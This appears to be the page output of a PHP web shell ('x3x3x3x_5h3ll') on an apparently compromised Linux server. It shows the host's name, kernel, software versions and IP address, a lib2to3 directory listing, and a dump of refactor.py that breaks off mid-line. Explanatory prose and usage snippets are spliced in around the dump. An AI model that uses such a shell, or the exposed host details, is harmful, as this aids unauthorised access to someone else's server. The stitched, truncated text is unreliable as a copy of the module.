x3x3x3x_5h3ll
— 53cur3 — 5h3ll_1d —
Linux vps-10654784.cedaps.org.br 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
  SERVER: Apache | PHP: 7.4.33
/lib64/python3.6/lib2to3/
162.240.100.168

 
[ NAME ]                            [ SIZE ]    [ PERM ]     [ DATE ]
__pycache__                         dir         drwxr-xr-x   2024-10-07 16:37
fixes                               dir         drwxr-xr-x   2024-10-07 16:37
pgen2                               dir         drwxr-xr-x   2024-10-07 16:37
Grammar.txt                         6.408 KB    -rw-r--r--   2018-12-23 21:37
Grammar3.6.8.final.0.pickle         31.496 KB   -rw-r--r--   2024-09-24 14:11
PatternGrammar.txt                  0.774 KB    -rw-r--r--   2018-12-23 21:37
PatternGrammar3.6.8.final.0.pickle  2.044 KB    -rw-r--r--   2024-09-24 14:11
__init__.py                         0.007 KB    -rw-r--r--   2018-12-23 21:37
__main__.py                         0.065 KB    -rw-r--r--   2018-12-23 21:37
btm_matcher.py                      6.673 KB    -rw-r--r--   2018-12-23 21:37
btm_utils.py                        9.732 KB    -rw-r--r--   2018-12-23 21:37
fixer_base.py                       6.533 KB    -rw-r--r--   2018-12-23 21:37
fixer_util.py                       14.851 KB   -rw-r--r--   2018-12-23 21:37
main.py                             11.38 KB    -rw-r--r--   2018-12-23 21:37
patcomp.py                          6.879 KB    -rw-r--r--   2018-12-23 21:37
pygram.py                           1.127 KB    -rw-r--r--   2018-12-23 21:37
pytree.py                           27.395 KB   -rw-r--r--   2018-12-23 21:37
refactor.py                         27.31 KB    -rw-r--r--   2018-12-23 21:37
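
The listing above is the stock lib2to3 package layout: Grammar.txt and its .pickle cache feed the pgen2 parser driver, the fixes directory holds the individual fixers, and refactor.py (dumped below) ties them together. As a rough illustration only, assuming an ordinary CPython 3.6 install like the one listed, the bundled fixers can be enumerated with the module's own helper:

# Illustrative sketch (not output from this host): list the fixers that
# lib2to3 discovers in its bundled "fixes" package.
from lib2to3.refactor import get_all_fix_names

# get_all_fix_names() scans the package directory for fix_*.py modules
# and returns their names with the "fix_" prefix stripped.
for name in get_all_fix_names("lib2to3.fixes"):
    print(name)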
refactor.py:
# Copyright 2006 Google, Inc. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.

"""Refactoring framework.

Used as a main program, this can refactor any number of files and/or
recursively descend down directories.  Imported as a module, this
provides infrastructure to write your own refactoring tool.
"""

__author__ = "Guido van Rossum <guido@python.org>"


# Python imports
import os
import sys
import logging
import operator
import collections
import io
from itertools import chain

# Local imports
from .pgen2 import driver, tokenize, token
from .fixer_util import find_root
from . import pytree, pygram
from . import btm_matcher as bm


def get_all_fix_names(fixer_pkg, remove_prefix=True):
    """Return a sorted list of all available fix names in the given package."""
    pkg = __import__(fixer_pkg, [], [], ["*"])
    fixer_dir = os.path.dirname(pkg.__file__)
    fix_names = []
    for name in sorted(os.listdir(fixer_dir)):
        if name.startswith("fix_") and name.endswith(".py"):
            if remove_prefix:
                name = name[4:]
            fix_names.append(name[:-3])
    return fix_names


class _EveryNode(Exception):
    pass


def _get_head_types(pat):
    """ Accepts a pytree Pattern Node and returns a set
        of the pattern types which will match first. """

    if isinstance(pat, (pytree.NodePattern, pytree.LeafPattern)):
        # NodePatterns must either have no type and no content
        #   or a type and content -- so they don't get any farther
        # Always return leaves
        if pat.type is None:
            raise _EveryNode
        return {pat.type}

    if isinstance(pat, pytree.NegatedPattern):
        if pat.content:
            return _get_head_types(pat.content)
        raise _EveryNode  # Negated Patterns don't have a type

    if isinstance(pat, pytree.WildcardPattern):
        # Recurse on each node in content
        r = set()
        for p in pat.content:
            for x in p:
                r.update(_get_head_types(x))
        return r

    raise Exception("Oh no! I don't understand pattern %s" % (pat))


def _get_headnode_dict(fixer_list):
    """ Accepts a list of fixers and returns a dictionary
        of head node type --> fixer list.  """
    head_nodes = collections.defaultdict(list)
    every = []
    for fixer in fixer_list:
        if fixer.pattern:
            try:
                heads = _get_head_types(fixer.pattern)
            except _EveryNode:
                every.append(fixer)
            else:
                for node_type in heads:
                    head_nodes[node_type].append(fixer)
        else:
            if fixer._accept_type is not None:
                head_nodes[fixer._accept_type].append(fixer)
            else:
                every.append(fixer)
    for node_type in chain(pygram.python_grammar.symbol2number.values(),
                           pygram.python_grammar.tokens):
        head_nodes[node_type].extend(every)
    return dict(head_nodes)


def get_fixers_from_package(pkg_name):
    """
    Return the fully qualified names for fixers in the package pkg_name.
    """
    return [pkg_name + "." + fix_name
            for fix_name in get_all_fix_names(pkg_name, False)]


def _identity(obj):
    return obj


if sys.version_info < (3, 0):
    import codecs
    _open_with_encoding = codecs.open
    # codecs.open doesn't translate newlines sadly.
    def _from_system_newlines(input):
        return input.replace("\r\n", "\n")
    def _to_system_newlines(input):
        if os.linesep != "\n":
            return input.replace("\n", os.linesep)
        else:
            return input
else:
    _open_with_encoding = open
    _from_system_newlines = _identity
    _to_system_newlines = _identity


def _detect_future_features(source):
    have_docstring = False
    gen = tokenize.generate_tokens(io.StringIO(source).readline)
    def advance():
        tok = next(gen)
        return tok[0], tok[1]
    ignore = frozenset({token.NEWLINE, tokenize.NL, token.COMMENT})
    features = set()
    try:
        while True:
            tp, value = advance()
            if tp in ignore:
                continue
            elif tp == token.STRING:
                if have_docstring:
                    break
                have_docstring = True
            elif tp == token.NAME and value == "from":
                tp, value = advance()
                if tp != token.NAME or value != "__future__":
                    break
                tp, value = advance()
                if tp != token.NAME or value != "import":
                    break
                tp, value = advance()
                if tp == token.OP and value == "(":
                    tp, value = advance()
                while tp == token.NAME:
                    features.add(value)
                    tp, value = advance()
                    if tp != token.OP or value != ",":
                        break
                    tp, value = advance()
            else:
                break
    except StopIteration:
        pass
    return frozenset(features)


class FixerError(Exception):
    """A fixer could not be loaded."""


class RefactoringTool(object):

    _default_options = {"print_function" : False,
                        "write_unchanged_files" : False}

    CLASS_PREFIX = "Fix"  # The prefix for fixer classes
    FILE_PREFIX = "fix_"  # The prefix for modules with a fixer within

    def __init__(s
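
For reference, a minimal usage sketch of the module dumped above; the fixer package and the sample source string are illustrative assumptions, not taken from this server:

# Illustrative sketch: drive lib2to3's RefactoringTool directly.
from lib2to3.refactor import RefactoringTool, get_fixers_from_package

# Load every fixer bundled in lib2to3.fixes (the directory listed above).
tool = RefactoringTool(get_fixers_from_package("lib2to3.fixes"))

# refactor_string() parses the source with lib2to3's own grammar, applies
# any matching fixers, and returns the transformed parse tree.
# The input must end with a newline.
source = "print 'hello'\n"
tree = tool.refactor_string(source, "<example>")
print(str(tree))  # print('hello')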